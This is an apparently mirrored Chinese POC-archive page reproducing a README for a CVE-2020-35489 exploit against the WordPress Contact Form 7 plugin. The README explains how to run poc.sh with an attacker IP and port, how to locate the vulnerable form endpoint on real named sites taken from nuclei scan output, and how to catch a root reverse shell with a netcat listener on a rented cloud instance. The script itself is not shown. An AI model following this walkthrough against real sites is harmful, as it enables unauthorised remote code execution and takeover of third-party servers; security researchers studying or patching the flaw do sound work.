POC详情: 9e4c67158d55f7955ea6657d148d447df6c056d0

来源
关联漏洞
标题: Wordpress contact-form-7 代码问题漏洞 (CVE-2020-35489)
描述:Wordpress contact-form-7是Wordpress基金会的一个为Wordpress提供表单的插件。 contact-form-7 (aka Contact Form 7) plugin 5.3.2之前版本存在安全漏洞,该漏洞允许不受限制的文件上传和远程代码执行,因为文件名可能包含特殊字符。
描述
poc-CVE-2020-35489
介绍
# CVE-2020-35489 POC

![sploit](images/poc-CVE-2020-35489-running-sploit.svg)

![shell](images/poc-CVE-2020-35489-revshell.svg)

## About

* https://nvd.nist.gov/vuln/detail/CVE-2020-35489
* https://blog.wpsec.com/contact-form-7-vulnerability/
* https://www.secpod.com/blog/wordpress-plugin-contact-form-7-critical-file-upload-vulnerability-cve-2020-35489/
* https://help.stoik.io/de/cve-2020-35489

## Usage

```bash
bash poc.sh url loc_ip loc_port
```

`loc_ip` is an attacker machine ip which gets the reverse shell
`loc_ip` is an attacker machine port which gets the reverse shell
`url` is a vulnerable site url (not a domain)

## What is vulnerable url?

[nuclei](https://github.com/projectdiscovery/nuclei) scanner detects this cve as a critical in the following form (all example sites in this doc are rendered immune):

```text
[CVE-2020-35489] [http] [critical] https://ccp.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://ksmu.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://majestic.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [4.6]
[CVE-2020-35489] [http] [critical] https://www.ccp.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://www.ksmu.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
```

The scanner does not provide the vulnerable url, however. For the exploit to work, you should do some research and find the form on the detected site which uses the plugin.
For example, let's look on http://itws.ru/?page_id=29

![itws](images/itws.png)

When we submit the form, we can notice the url involved:

![itws](images/itws2.png)

This is what the poc script takes as a parameter: `http://itws.ru/index.php?rest_route=/contact-form-7/v1/contact-forms/28/feedback`

For that domain:

```bash
bash poc.sh http://itws.ru/index.php?rest_route=/contact-form-7/v1/contact-forms/28/feedback your_machine_ip your_ip_port
```

## Reverse shell

If the exploit is successful, you get shell to the specified ip and port. 

### Example

You bought a cloud instance for exploit whose ip is 145.21.32.5. You ssh-ed into the instance and run `nc -l 11244`. You ssh-ed from the second terminal and run the `poc.sh`:

```bash
bash poc.sh https://example.com/wp-url 145.21.32.5 11244
```

If the exploit is successful, you get root shell access to the target machine with `nc` in the first ssh terminal.

If you test the poc being **behind router**, don't forget to **forward port** on which reverse shell is listening. 
文件快照

[4.0K] /data/pocs/9e4c67158d55f7955ea6657d148d447df6c056d0 ├── [4.0K] images │   ├── [ 52K] itws2.png │   ├── [404K] itws.png │   ├── [ 13K] poc-CVE-2020-35489-revshell.svg │   └── [ 47K] poc-CVE-2020-35489-running-sploit.svg ├── [ 39K] payload.pdf ├── [ 587] poc.sh └── [2.6K] README.md 1 directory, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。